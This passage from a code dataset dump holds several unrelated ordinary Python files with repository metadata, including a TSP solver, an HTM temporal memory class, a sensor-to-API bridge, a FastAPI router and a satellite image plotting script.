if s in ones:\n return ones.index(s)\n return 10 * tens.index(s)\n \ndef eng2nums(s):\n if ' hundred' in s:\n x,y = s.split(' hundred')\n return 100 * handle_two_digits(x) + handle_two_digits(y.lstrip())\n return handle_two_digits(s)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"9cuQrhEMwiESfKznk_14.py","file_name":"9cuQrhEMwiESfKznk_14.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30012083298","text":"\"\"\"\nThis program is a modification based on work created and shared by Google (https://developers.google.com/readme/policies) and used according to terms described in the Apache 2.0 License 
(https://www.apache.org/licenses/LICENSE-2.0).\nThe original code can be found in https://developers.google.com/optimization/routing/tsp\n\"\"\"\n\nimport math\nfrom random import random\nfrom ortools.constraint_solver import routing_enums_pb2\nfrom ortools.constraint_solver import pywrapcp\nfrom matplotlib.path import Path\nfrom matplotlib import patches\nimport matplotlib.pyplot as plt\n\n\ndef create_data_model():\n \"\"\"Stores the data for the problem.\"\"\"\n data = {}\n # Locations in block units\n data['locations'] = [(random()*100, random()*100) for i in range(100)]\n data['num_vehicles'] = 1\n data['depot'] = 0\n return data\n\n\ndef compute_euclidean_distance_matrix(locations):\n \"\"\"Creates callback to return distance between points.\"\"\"\n distances = {}\n for from_counter, from_node in enumerate(locations):\n distances[from_counter] = {}\n for to_counter, to_node in enumerate(locations):\n if from_counter == to_counter:\n distances[from_counter][to_counter] = 0\n else:\n # Euclidean distance\n distances[from_counter][to_counter] = (int(\n math.hypot((from_node[0] - to_node[0]),\n (from_node[1] - to_node[1]))))\n return distances\n\n\ndef print_solution(manager, routing, solution, locations):\n \"\"\"Plots solution on the xy plane.\"\"\"\n \"\"\"Modified from the original code.\"\"\"\n print('Objective: {}'.format(solution.ObjectiveValue()))\n index = routing.Start(0)\n vertices = []\n while not routing.IsEnd(index):\n vertices.append(locations[manager.IndexToNode(index)])\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n fig, ax = plt.subplots()\n x, y = zip(*vertices)\n line, = ax.plot(x, y, 'bo-')\n ax.set_xlim(0, 100)\n ax.set_ylim(0, 100)\n plt.show()\n\n\ndef main():\n \"\"\"Entry point of the program.\"\"\"\n # Instantiate the data problem.\n data = create_data_model()\n\n # Create the routing index manager.\n manager = pywrapcp.RoutingIndexManager(len(data['locations']),\n data['num_vehicles'], data['depot'])\n\n # Create Routing Model.\n routing = pywrapcp.RoutingModel(manager)\n\n distance_matrix = compute_euclidean_distance_matrix(data['locations'])\n\n def distance_callback(from_index, to_index):\n \"\"\"Returns the distance between the two nodes.\"\"\"\n # Convert from routing variable Index to distance matrix NodeIndex.\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return distance_matrix[from_node][to_node]\n\n transit_callback_index = routing.RegisterTransitCallback(distance_callback)\n\n # Define cost of each arc.\n routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n\n # Setting first solution heuristic.\n search_parameters = pywrapcp.DefaultRoutingSearchParameters()\n search_parameters.first_solution_strategy = (\n routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)\n\n # Solve the problem.\n solution = routing.SolveWithParameters(search_parameters)\n\n # Print solution on console.\n if solution:\n print_solution(manager, routing, solution, data['locations'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"antenna-three/or-tools","sub_path":"tsp.py","file_name":"tsp.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8650811950","text":"valor = float(input('Qual o valor do imovel? 
'))\nsalario = float(input('Qual o valor do salario?'))\nq_anos = int(input('Em quantos anos deseja parcelar?'))\n\nmeses = q_anos * 12\nprestacao = valor / meses\npercentual = salario * 0.30\n\nif prestacao > percentual:\n print('Emprestimo negado, o valor da prestação execeu 30% do salario')\nelse:\n print('Emprestimo liberado, o valor da parcela e de {:.2f}R$, parcelados em {} meses'.format(prestacao,meses))\n","repo_name":"DenisSantos35/Aulas-Python-Curso-em-Video","sub_path":"Curso Python/pythonExercicios/ex036.py","file_name":"ex036.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30453783804","text":"import csv\nimport os\nimport cv2\nfrom config import *\n\n\ndef crop_test_img():\n with open(UPLOAD_CSV_TEMPLATE_PATH, 'r', newline='', encoding='UTF-8-sig') as train_csv:\n rows = list(csv.reader(train_csv))\n del rows[0]\n cropping_list = [[y for y in x if len(y) > 0] for x in rows]\n for img in cropping_list:\n file_name = img[0]\n mango_coordinate = img[1:]\n crop_img(\n input_path=os.path.join(MANGO_DATA_DIR, \"Test\", file_name),\n coordinate=mango_coordinate,\n output_path=os.path.join(SAVE_CROPPED_TEST_IMG_DIR, file_name),\n )\n\n print(\"Test image cropping finished\")\n\n\ndef crop_img(input_path, coordinate, output_path):\n if not os.path.exists(input_path):\n raise Exception(f\"Cropping Path Not Found - {input_path}\")\n\n img = cv2.imread(input_path)\n [x, y, w, h] = coordinate\n x, y, w, h = int(float(x)), int(float(y)), int(float(w)), int(float(h))\n crop_img = img[y:y + h, x:x + w]\n cv2.imwrite(output_path, crop_img, [cv2.IMWRITE_JPEG_QUALITY, 100])\n print(f\"write cropped img to {output_path}\")\n\n\ndef main():\n crop_test_img()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chihong0522/mango-defect-detection-yolov5","sub_path":"test_img_cropping.py","file_name":"test_img_cropping.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"4652979856","text":"import numpy as np\nfrom scipy.sparse import spmatrix, csr_matrix, csc_matrix, coo_matrix\n\n\nclass TemporalMemory:\n def __init__(\n self,\n num_columns: int,\n num_column_cells: int,\n max_segment: int,\n synapse_min=0,\n synapse_init=60,\n synapse_max=100,\n synapse_threshold=50,\n synapse_inc=2,\n synapse_dec=1,\n segment_active_threshold=10,\n segment_match_threshold=7):\n\n self.num_columns = num_columns\n self.num_column_cells = num_column_cells\n self.max_segment = max_segment\n self.num_cells = num_columns * num_column_cells\n\n self.synapse_min = synapse_min\n self.synapse_init = synapse_init\n self.synapse_max = synapse_max\n\n self.synapse_threshold = synapse_threshold\n self.synapse_inc = synapse_inc\n self.synapse_dec = synapse_dec\n\n self.segment_active_threshold = segment_active_threshold\n self.segment_match_threshold = segment_match_threshold\n\n self.active_columns = csr_matrix((1, num_columns))\n\n self.bursting_winner_cells = csr_matrix(\n (num_columns, num_column_cells))\n self.predictive_cells = csr_matrix((num_columns, num_column_cells))\n self.active_cells = csr_matrix((num_columns, num_column_cells))\n self.winner_cells = csr_matrix((num_columns, num_column_cells))\n\n self.potential_synapses = {}\n self.synapse_strengths = {}\n\n def inference(self, active_columns: spmatrix):\n # (max_segment, num_cells, num_cells)\n connected_synapses = {\n idx: matrix >= self.synapse_threshold for 
idx,\n matrix in self.synapse_strengths.items()} # (segments, cells, cells)\n segment_activations = csr_matrix(\n (self.num_cells, self.max_segment)) # (cells, segments)\n for idx, synapses in connected_synapses.items():\n segment_activations[:, idx] = self.active_cells.dot(synapses)\n\n # (cells, segments)\n active_segments = segment_activations >= self.segment_active_threshold\n predictive_cells = self._reduce_or(\n active_segments, axis=1) # (1, cells)\n\n predictive_active_cells = csr_matrix(\n (self.num_columns, self.num_column_cells))\n for i in range(self.num_column_cells):\n predictive_active_cells[:, i] = active_columns.transpose().multiply(csc_matrix(\n predictive_cells.reshape(self.num_columns, self.num_column_cells))[:, i]) # AND operation, # (1, cells)\n\n predictive_columns = self._reduce_or(\n predictive_cells.reshape(\n self.num_columns,\n self.num_column_cells),\n axis=1) # (1, columns)\n bursting_columns = active_columns - \\\n active_columns.multiply(predictive_columns) # (1, columns)\n\n active_cells = csr_matrix((self.num_columns, self.num_column_cells))\n for i in range(self.num_column_cells):\n active_cells[:, i] = predictive_active_cells[:,\n i].maximum(bursting_columns.transpose())\n return active_cells.reshape((1, self.num_cells))\n\n def _reduce_or(self, matrix: spmatrix, axis: int):\n matrix = coo_matrix(matrix)\n if axis == 0:\n nonzero_indices = np.unique(matrix.col)\n reduced_vector = coo_matrix(\n ([1] * len(nonzero_indices),\n ([0] * len(nonzero_indices),\n nonzero_indices)),\n shape=(\n 1,\n matrix.shape[1]))\n elif axis == 1:\n nonzero_indices = np.unique(matrix.row)\n reduced_vector = coo_matrix(\n ([1] * len(nonzero_indices),\n ([0] * len(nonzero_indices),\n nonzero_indices)),\n shape=(\n 1,\n matrix.shape[0]))\n return csr_matrix(reduced_vector)\n","repo_name":"csongorpilinszkinagy/htm-python","sub_path":"temporal_memory.py","file_name":"temporal_memory.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16333586627","text":"showStr = lambda list : ' '.join(map(str, list))\r\nfrom collections import deque\r\nclass Queue:\r\n def __init__(self, q=None):\r\n if q == None:\r\n self.items = deque()\r\n else:\r\n self.items = deque(q, len(q))\r\n def enQueue(self, i):\r\n self.items.append(i)\r\n def deQueueRight(self):\r\n self.items.pop()\r\n def deQueue(self):\r\n return self.items.popleft()\r\n\r\n def isEmpty(self):\r\n return len(self.items) == 0\r\n\r\n def size(self):\r\n return len(self.items)\r\n def showQueu(self):\r\n Q = []\r\n for i in self.items:\r\n Q.append(i)\r\n return Q\r\n\r\ninp = input(\"Enter choice : \")\r\n\r\nif inp == '1':\r\n q1 = Queue()\r\n q1.enQueue(10)\r\n q1.enQueue(20)\r\n q1.enQueue(30)\r\n print(f'Queue data : {showStr(q1.showQueu())}')\r\n q1.deQueue()\r\n q1.enQueue(40)\r\n print(\"Size of Queue :\",q1.size())\r\n print(f'Queue data : {showStr(q1.showQueu())}')\r\n\r\nif inp == '2':\r\n q1 = Queue()\r\n q1.enQueue(100)\r\n q1.enQueue(200)\r\n q1.enQueue(300)\r\n q1.deQueue()\r\n print(f'Queue data : {showStr(q1.showQueu())}')\r\n print(\"Queue is Empty :\", q1.isEmpty())\r\n\r\nif inp == '3':\r\n q1 = Queue()\r\n q1.enQueue(11)\r\n q1.enQueue(22)\r\n q1.enQueue(33)\r\n q1.deQueue()\r\n q1.deQueue()\r\n q1.deQueue()\r\n if q1.isEmpty() == True:\r\n print(f'Empty Queue')\r\n print(\"Size of Queue :\",q1.size())\r\n print(\"Queue is Empty :\", 
q1.isEmpty())\r\n","repo_name":"Paramee0598/Data_Structures_ExAndTest","sub_path":"test/L2.py","file_name":"L2.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33641097733","text":"#Embedded file name: c:\\depot\\games\\branches\\release\\EVE-TRANQUILITY\\carbon\\common\\stdlib\\unittest2\\__init__.py\n__all__ = ['TestResult',\n 'TestCase',\n 'TestSuite',\n 'TextTestRunner',\n 'TestLoader',\n 'FunctionTestCase',\n 'main',\n 'defaultTestLoader',\n 'SkipTest',\n 'skip',\n 'skipIf',\n 'skipUnless',\n 'expectedFailure',\n 'TextTestResult',\n '__version__']\n__version__ = '0.1.5'\n__all__.extend(['getTestCaseNames', 'makeSuite', 'findTestCases'])\n__all__.append('_TextTestResult')\nfrom unittest2.result import TestResult\nfrom unittest2.case import TestCase, FunctionTestCase, SkipTest, skip, skipIf, skipUnless, expectedFailure\nfrom unittest2.suite import TestSuite\nfrom unittest2.loader import TestLoader, defaultTestLoader, makeSuite, getTestCaseNames, findTestCases\nfrom unittest2.main import TestProgram, main\nfrom unittest2.runner import TextTestRunner, TextTestResult\n_TextTestResult = TextTestResult","repo_name":"alexcmd/eve","sub_path":"eve-8.21.494548/lib/carbonstdlib/unittest2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"27339320635","text":"import time\nimport pandas as pd\n\nfrom random import seed\nfrom random import randint\n\nimport serial\nfrom datetime import datetime\nimport numpy as np\nimport requests\nimport threading\n\n## configuration\nPORTNAME = 'COM3'\nseed(datetime.now().strftime(\"%d\"))\n\n\n# class for sending the glucose data every interval\nclass RepeatedTimer(object):\n def __init__(self, interval, function, i, date):\n self._timer = None\n self.interval = interval\n self.function = function\n self.i = i\n self.date = date\n self.is_running = False\n self.next_call = time.time()\n self.start()\n\n def _run(self):\n self.is_running = False\n self.start()\n self.i += 1\n self.function(self.i, self.date)\n\n def start(self):\n if not self.is_running:\n self.next_call += self.interval\n self._timer = threading.Timer(self.next_call - time.time(), self._run)\n self._timer.start()\n self.is_running = True\n\n def stop(self):\n self._timer.cancel()\n self.is_running = False\n\n\nclass Bridge():\n\n def __init__(self):\n self.userID = 1\n\n self.data = pd.read_csv(\"glucose_sensor_refined_data.csv\")\n value = randint(0, len(self.data))\n sample = self.data.iloc[value][\"Date\"]\n self.data = self.data[self.data['Date'] == sample]\n now = datetime.now()\n self.date = now.strftime(\"%Y-%m-%d\")\n self.data = self.data[::-1]\n\n def setup(self):\n\n # open serial port\n self.ser = serial.Serial(PORTNAME, 9600, timeout=0)\n # self.ser.open()\n\n # internal input buffer\n self.inbuffer = []\n\n # buffer that contains the bpm received from the microcontroller\n self.bpm_buffer = []\n\n # delete the glucose data relative to the current day to avoid inconsistencies\n url = f'https://fabioiot.pythonanywhere.com/api/testdelete/?date={self.date}'\n r = requests.delete(url)\n print(r.text)\n print(r.status_code)\n\n # start the periodic sending of glucose data\n self.rt = RepeatedTimer(1, self.sendGlucose, 0, self.date)\n print('Date from which we are getting the glucose data to send')\n print(self.date)\n\n def loop(self):\n # 
infinite loop\n while (True):\n # look for a byte from serial\n if self.ser.in_waiting > 0:\n # data available from the serial port\n lastchar = self.ser.read(1)\n\n if lastchar == b'\\xfe': # EOL\n print(\"\\nValue received\")\n self.useData()\n self.inbuffer = []\n else:\n # append\n self.inbuffer.append(lastchar)\n\n def sendBpm(self, bpm):\n print(\"inside sendBpm\")\n now = datetime.now()\n date = now.strftime(\"%Y-%m-%d\")\n time = now.strftime(\"%H:%M:%S\")\n type = \"H\"\n value = round(bpm)\n user = self.userID\n\n payload = {'date': date, 'time': time, 'type': type, 'value': value, 'user': user}\n url = 'https://fabioiot.pythonanywhere.com/api/measurements/'\n try:\n r = requests.post(url, data=payload, timeout=60)\n # r = requests.post(url, data=json.dumps(payload), timeout=10) # use this if the API need json\n print('-' * 10)\n print(r.json())\n print(r.status_code)\n print('-' * 10)\n except:\n print(\"Server non raggiungibile bpm\")\n print('-' * 10)\n print(r.status_code)\n print('-' * 10)\n\n return r.status_code\n\n def sendGlucose(self, i, date):\n try:\n row = self.data.iloc[i]\n time = row['Time']\n type = \"G\"\n value = row['Sensor Glucose (mg/dL)']\n user = 1\n\n\n\n payload = {'date': date, 'time': time, 'type': type, 'value': value, 'user': user}\n url = 'https://fabioiot.pythonanywhere.com/api/measurements/'\n r = requests.post(url, data=payload, timeout=60)\n print('-' * 10)\n print(r.json())\n print(r.status_code)\n print('-' * 10)\n except IndexError:\n print(\"Finished sending Glucose data!\")\n self.rt.stop()\n except:\n # controlla se si riesce a prendere l'eccezione dell'iloc a in caso stoppa il tutto\n print(\"Server non raggiungibile glucose\")\n print('-' * 10)\n print(r.status_code)\n print('-' * 10)\n\n def useData(self):\n # I have received a line from the serial port. I can use it\n if len(self.inbuffer) < 2: # at least header, size, footer\n return False\n # split parts\n if self.inbuffer[0] != b'\\xff':\n return False\n\n numval = int.from_bytes(self.inbuffer[1], byteorder='little')\n if numval == 0:\n self.bpm_buffer = []\n else:\n for i in range(numval):\n val = int.from_bytes(self.inbuffer[i + 2], byteorder='little')\n if val > 20:\n self.bpm_buffer.append(val)\n strval = \"Sensor %d: %d \" % (i, val)\n print(strval)\n if len(self.bpm_buffer) == 10:\n avg_bpm = 0\n for bpm in self.bpm_buffer:\n avg_bpm += bpm\n avg_bpm /= 10\n print(\"the mean of BPM is \" + str(avg_bpm))\n t = threading.Thread(target=self.sendBpm, args=[avg_bpm])\n t.start()\n self.ser.write(b'g')\n self.bpm_buffer = []\n\n\nif __name__ == '__main__':\n br = Bridge()\n br.setup()\n br.loop()\n","repo_name":"FabioPolito24/IoT_project","sub_path":"Bridge.py","file_name":"Bridge.py","file_ext":"py","file_size_in_byte":5757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10766451315","text":"from typing import Dict\n\nfrom twsecrawler import ref\nfrom core import Candlestick\nfrom database import DbMapper\n\n\ndef is_bollinger_deviate(check_date: str, stock_no: str):\n\n try:\n db = DbMapper.db_mapper(check_date)\n stock_info = db.find_single_stock(stock_no)\n date_price_info = stock_info[\"prices\"][check_date]\n cur_p = date_price_info[\"end_p\"]\n boll_high = date_price_info[\"index\"][\"boll\"][\"boll_high\"]\n boll_low = date_price_info[\"index\"][\"boll\"][\"boll_low\"]\n\n except Exception as e:\n print(f'!!! 
Fail to get bollinger or end_p value for stock = {stock_no}, at date = {check_date}')\n print(e)\n return False\n\n if cur_p > boll_high:\n return True\n\n if cur_p < boll_low:\n return True\n\n return False\n","repo_name":"Nil-cire/stockAnalyst","sub_path":"stockfilter/BollingFilter.py","file_name":"BollingFilter.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32794936713","text":"from datetime import datetime, timedelta\nfrom fastapi import APIRouter, Body, HTTPException\nfrom fastapi.encoders import jsonable_encoder\nfrom json import JSONDecodeError\n\n\nfrom schemas.sportbots import *\nfrom schemas.util import *\n\nfrom db_helper import (\n create_document,\n get_document_by_id,\n get_document_by_name,\n get_document_by_sport,\n get_documents,\n get_sportbot_by_number,\n)\n\n\nsportbots = APIRouter()\n\ncollection_name = \"sportbots_collection\"\n\n\n@sportbots.get(\"/sportbots/\")\nasync def get_sportrollbots(collection_name: str = collection_name):\n sportbot = await get_documents(collection_name)\n if sportbot:\n return ResponseModel(sportbot, \"Sportbot successfulyl retrieved from db\")\n return ResponseModel(sportbot, \"Empty list returned\")\n\n\n@sportbots.get(\"/sportbots/{number}\")\nasync def get_bot_by_number(number: int, collection_name: str = collection_name):\n sportbot = await get_sportbot_by_number(collection_name, number)\n if sportbot:\n return ResponseModel(\n sportbot, \"Successfully retrived Sportbot {} from DB\".format(number)\n )\n return ErrorResponseModel(\"Error\", 404, \"Something went wrong retrieved from db\")\n\n\n@sportbots.post(\"/sportbots/\")\nasync def add_rollbot_data(\n collection_name: str = collection_name, sportrollbot: SportbotSchema = Body(...)\n):\n try:\n sportrollbot = jsonable_encoder(sportrollbot)\n print(sportrollbot)\n new_sportbot = await create_document(collection_name, sportrollbot)\n print(new_sportbot)\n return ResponseModel(new_sportbot, \"Sportbot added succesfully\")\n except JSONDecodeError:\n raise HTTPException(status_code=400, detail=\"Invalid JSON format\")\n","repo_name":"69Kadsen/BackendProject","sub_path":"my_app/api/routes/sportbots.py","file_name":"sportbots.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41946851940","text":"\"\"\"Plots satellite images for the given days.\"\"\"\n\nimport argparse\nimport numpy\nimport matplotlib\nmatplotlib.use('agg')\nfrom matplotlib import pyplot\nfrom gewittergefahr.gg_utils import number_rounding\nfrom gewittergefahr.gg_utils import time_conversion\nfrom gewittergefahr.gg_utils import file_system_utils\nfrom gewittergefahr.gg_utils import error_checking\nfrom ml4convection.io import satellite_io\nfrom ml4convection.io import example_io\nfrom ml4convection.io import border_io\nfrom ml4convection.plotting import plotting_utils\nfrom ml4convection.plotting import satellite_plotting\n\nSEPARATOR_STRING = '\\n\\n' + '*' * 50 + '\\n\\n'\n\nDAYS_TO_SECONDS = 86400\nTIME_FORMAT = '%Y-%m-%d-%H%M'\n\nFIGURE_RESOLUTION_DPI = 300\nFIGURE_WIDTH_INCHES = 15\nFIGURE_HEIGHT_INCHES = 15\n\nSATELLITE_DIR_ARG_NAME = 'input_satellite_dir_name'\nFIRST_DATE_ARG_NAME = 'first_date_string'\nLAST_DATE_ARG_NAME = 'last_date_string'\nBAND_NUMBERS_ARG_NAME = 'band_numbers'\nDAILY_TIMES_ARG_NAME = 'daily_times_seconds'\nSPATIAL_DS_FACTOR_ARG_NAME = 'spatial_downsampling_factor'\nOUTPUT_DIR_ARG_NAME 
= 'output_dir_name'\n\nSATELLITE_DIR_HELP_STRING = (\n 'Name of directory with satellite data. Files therein will be found by '\n '`satellite_io.find_file` and read by `satellite_io.read_file`.'\n)\nDATE_HELP_STRING = (\n 'Date (format \"yyyymmdd\"). Will plot satellite images for all days in the '\n 'period `{0:s}`...`{1:s}`.'\n).format(FIRST_DATE_ARG_NAME, LAST_DATE_ARG_NAME)\n\nBAND_NUMBERS_HELP_STRING = (\n 'List of band numbers. Will plot brightness temperatures for these '\n 'spectral bands only.'\n)\nDAILY_TIMES_HELP_STRING = (\n 'List of times to plot for each day. All values should be in the range '\n '0...86399.'\n)\nSPATIAL_DS_FACTOR_HELP_STRING = (\n 'Downsampling factor, used to coarsen spatial resolution. If you do not '\n 'want to coarsen spatial resolution, leave this alone.'\n)\nOUTPUT_DIR_HELP_STRING = (\n 'Name of top-level output directory. Images will be saved here (one '\n 'subdirectory per band).'\n)\n\nINPUT_ARG_PARSER = argparse.ArgumentParser()\nINPUT_ARG_PARSER.add_argument(\n '--' + SATELLITE_DIR_ARG_NAME, type=str, required=True,\n help=SATELLITE_DIR_HELP_STRING\n)\nINPUT_ARG_PARSER.add_argument(\n '--' + FIRST_DATE_ARG_NAME, type=str, required=True, help=DATE_HELP_STRING\n)\nINPUT_ARG_PARSER.add_argument(\n '--' + LAST_DATE_ARG_NAME, type=str, required=True, help=DATE_HELP_STRING\n)\nINPUT_ARG_PARSER.add_argument(\n '--' + BAND_NUMBERS_ARG_NAME, type=int, nargs='+', required=True,\n help=BAND_NUMBERS_HELP_STRING\n)\nINPUT_ARG_PARSER.add_argument(\n '--' + DAILY_TIMES_ARG_NAME, type=int, nargs='+', required=True,\n help=DAILY_TIMES_HELP_STRING\n)\nINPUT_ARG_PARSER.add_argument(\n '--' + SPATIAL_DS_FACTOR_ARG_NAME, type=int, required=False, default=1,\n help=SPATIAL_DS_FACTOR_HELP_STRING\n)\nINPUT_ARG_PARSER.add_argument(\n '--' + OUTPUT_DIR_ARG_NAME, type=str, required=True,\n help=OUTPUT_DIR_HELP_STRING\n)\n\n\ndef _plot_one_satellite_image(\n satellite_dict, time_index, band_index, border_latitudes_deg_n,\n border_longitudes_deg_e, top_output_dir_name):\n \"\"\"Plots one satellite image.\n\n :param satellite_dict: Dictionary in format returned by\n `satellite_io.read_file`.\n :param time_index: Index of time to plot.\n :param band_index: Index of spectral band to plot.\n :param border_latitudes_deg_n: See doc for `_plot_satellite_one_day`.\n :param border_longitudes_deg_e: Same.\n :param top_output_dir_name: Same.\n \"\"\"\n\n latitudes_deg_n = satellite_dict[satellite_io.LATITUDES_KEY]\n longitudes_deg_e = satellite_dict[satellite_io.LONGITUDES_KEY]\n\n figure_object, axes_object = pyplot.subplots(\n 1, 1, figsize=(FIGURE_WIDTH_INCHES, FIGURE_HEIGHT_INCHES)\n )\n\n plotting_utils.plot_borders(\n border_latitudes_deg_n=border_latitudes_deg_n,\n border_longitudes_deg_e=border_longitudes_deg_e,\n axes_object=axes_object\n )\n\n valid_time_unix_sec = (\n satellite_dict[satellite_io.VALID_TIMES_KEY][time_index]\n )\n valid_time_string = time_conversion.unix_sec_to_string(\n valid_time_unix_sec, TIME_FORMAT\n )\n band_number = satellite_dict[satellite_io.BAND_NUMBERS_KEY][band_index]\n title_string = 'Band-{0:d} brightness temperature at {1:s}'.format(\n band_number, valid_time_string\n )\n\n brightness_temp_matrix_kelvins = (\n satellite_dict[satellite_io.BRIGHTNESS_TEMP_KEY][\n time_index, ..., band_index\n ]\n )\n\n satellite_plotting.plot_2d_grid_latlng(\n brightness_temp_matrix_kelvins=brightness_temp_matrix_kelvins,\n axes_object=axes_object,\n min_latitude_deg_n=numpy.min(latitudes_deg_n),\n min_longitude_deg_e=numpy.min(longitudes_deg_e),\n 
latitude_spacing_deg=numpy.diff(latitudes_deg_n[:2])[0],\n longitude_spacing_deg=numpy.diff(longitudes_deg_e[:2])[0]\n )\n\n plotting_utils.plot_grid_lines(\n plot_latitudes_deg_n=latitudes_deg_n,\n plot_longitudes_deg_e=longitudes_deg_e, axes_object=axes_object,\n parallel_spacing_deg=2., meridian_spacing_deg=2.\n )\n\n axes_object.set_title(title_string)\n\n output_file_name = (\n '{0:s}/{1:s}/brightness-temperature_{2:s}_band{3:02d}.jpg'\n ).format(\n top_output_dir_name, valid_time_string[:10].replace('-', ''),\n valid_time_string, band_number\n )\n file_system_utils.mkdir_recursive_if_necessary(file_name=output_file_name)\n\n print('Saving figure to file: \"{0:s}\"...'.format(output_file_name))\n figure_object.savefig(\n output_file_name, dpi=FIGURE_RESOLUTION_DPI,\n pad_inches=0, bbox_inches='tight'\n )\n pyplot.close(figure_object)\n\n\ndef _plot_satellite_one_day(\n satellite_file_name, border_latitudes_deg_n, border_longitudes_deg_e,\n band_numbers, daily_times_seconds, spatial_downsampling_factor,\n top_output_dir_name):\n \"\"\"Plots satellite images for one day.\n\n P = number of points in border set\n\n :param satellite_file_name: Path to input file. Will be read by\n `satellite_io.read_file`.\n :param border_latitudes_deg_n: length-P numpy array of latitudes (deg N).\n :param border_longitudes_deg_e: length-P numpy array of longitudes (deg E).\n :param band_numbers: See documentation at top of file.\n :param daily_times_seconds: Same.\n :param spatial_downsampling_factor: Same.\n :param top_output_dir_name: Same.\n \"\"\"\n\n print('Reading data from: \"{0:s}\"...'.format(satellite_file_name))\n satellite_dict = satellite_io.read_file(\n netcdf_file_name=satellite_file_name, fill_nans=False\n )\n\n if spatial_downsampling_factor is not None:\n satellite_dict = example_io.downsample_data_in_space(\n satellite_dict=satellite_dict,\n downsampling_factor=spatial_downsampling_factor,\n change_coordinates=True\n )[0]\n\n satellite_dict = satellite_io.subset_by_band(\n satellite_dict=satellite_dict, band_numbers=band_numbers\n )\n\n valid_times_unix_sec = satellite_dict[satellite_io.VALID_TIMES_KEY]\n base_time_unix_sec = number_rounding.floor_to_nearest(\n valid_times_unix_sec[0], DAYS_TO_SECONDS\n )\n desired_times_unix_sec = numpy.round(\n base_time_unix_sec + daily_times_seconds\n ).astype(int)\n\n good_flags = numpy.array([\n t in valid_times_unix_sec for t in desired_times_unix_sec\n ], dtype=bool)\n\n if not numpy.any(good_flags):\n return\n\n desired_times_unix_sec = desired_times_unix_sec[good_flags]\n satellite_dict = satellite_io.subset_by_time(\n satellite_dict=satellite_dict,\n desired_times_unix_sec=desired_times_unix_sec\n )[0]\n\n num_times = len(satellite_dict[satellite_io.VALID_TIMES_KEY])\n num_bands = len(satellite_dict[satellite_io.BAND_NUMBERS_KEY])\n\n for i in range(num_times):\n for j in range(num_bands):\n _plot_one_satellite_image(\n satellite_dict=satellite_dict, time_index=i, band_index=j,\n border_latitudes_deg_n=border_latitudes_deg_n,\n border_longitudes_deg_e=border_longitudes_deg_e,\n top_output_dir_name=top_output_dir_name\n )\n\n\ndef _run(top_satellite_dir_name, first_date_string, last_date_string,\n band_numbers, daily_times_seconds, spatial_downsampling_factor,\n top_output_dir_name):\n \"\"\"Plots satellite images for the given days.\n\n This is effectively the main method.\n\n :param top_satellite_dir_name: See documentation at top of file.\n :param first_date_string: Same.\n :param last_date_string: Same.\n :param band_numbers: Same.\n 
:param daily_times_seconds: Same.\n :param spatial_downsampling_factor: Same.\n :param top_output_dir_name: Same.\n \"\"\"\n\n border_latitudes_deg_n, border_longitudes_deg_e = border_io.read_file()\n\n if spatial_downsampling_factor <= 1:\n spatial_downsampling_factor = None\n\n error_checking.assert_is_geq_numpy_array(daily_times_seconds, 0)\n error_checking.assert_is_less_than_numpy_array(\n daily_times_seconds, DAYS_TO_SECONDS\n )\n\n satellite_file_names = satellite_io.find_many_files(\n top_directory_name=top_satellite_dir_name,\n first_date_string=first_date_string,\n last_date_string=last_date_string,\n prefer_zipped=True, allow_other_format=True,\n raise_error_if_any_missing=False\n )\n\n for i in range(len(satellite_file_names)):\n _plot_satellite_one_day(\n satellite_file_name=satellite_file_names[i],\n border_latitudes_deg_n=border_latitudes_deg_n,\n border_longitudes_deg_e=border_longitudes_deg_e,\n band_numbers=band_numbers,\n daily_times_seconds=daily_times_seconds,\n spatial_downsampling_factor=spatial_downsampling_factor,\n top_output_dir_name=top_output_dir_name\n )\n\n if i != len(satellite_file_names) - 1:\n print(SEPARATOR_STRING)\n\n\nif __name__ == '__main__':\n INPUT_ARG_OBJECT = INPUT_ARG_PARSER.parse_args()\n\n _run(\n top_satellite_dir_name=getattr(\n INPUT_ARG_OBJECT, SATELLITE_DIR_ARG_NAME\n ),\n first_date_string=getattr(INPUT_ARG_OBJECT, FIRST_DATE_ARG_NAME),\n last_date_string=getattr(INPUT_ARG_OBJECT, LAST_DATE_ARG_NAME),\n band_numbers=numpy.array(\n getattr(INPUT_ARG_OBJECT, BAND_NUMBERS_ARG_NAME), dtype=int\n ),\n daily_times_seconds=numpy.array(\n getattr(INPUT_ARG_OBJECT, DAILY_TIMES_ARG_NAME), dtype=int\n ),\n spatial_downsampling_factor=getattr(\n INPUT_ARG_OBJECT, SPATIAL_DS_FACTOR_ARG_NAME\n ),\n top_output_dir_name=getattr(INPUT_ARG_OBJECT, 